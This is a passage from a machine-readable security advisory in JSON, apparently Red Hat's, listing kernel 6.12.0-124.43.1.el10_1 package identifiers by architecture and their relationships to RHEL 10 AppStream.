"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-uki-virt@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"product": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_id": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.43.1.el10_1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"product": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"product_id": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-doc@6.12.0-124.43.1.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"product": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"product_id": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-abi-stablelists@6.12.0-124.43.1.el10_1?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.43.1.el10_1.src",
"product": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src",
"product_id": "kernel-0:6.12.0-124.43.1.el10_1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.43.1.el10_1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.src",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
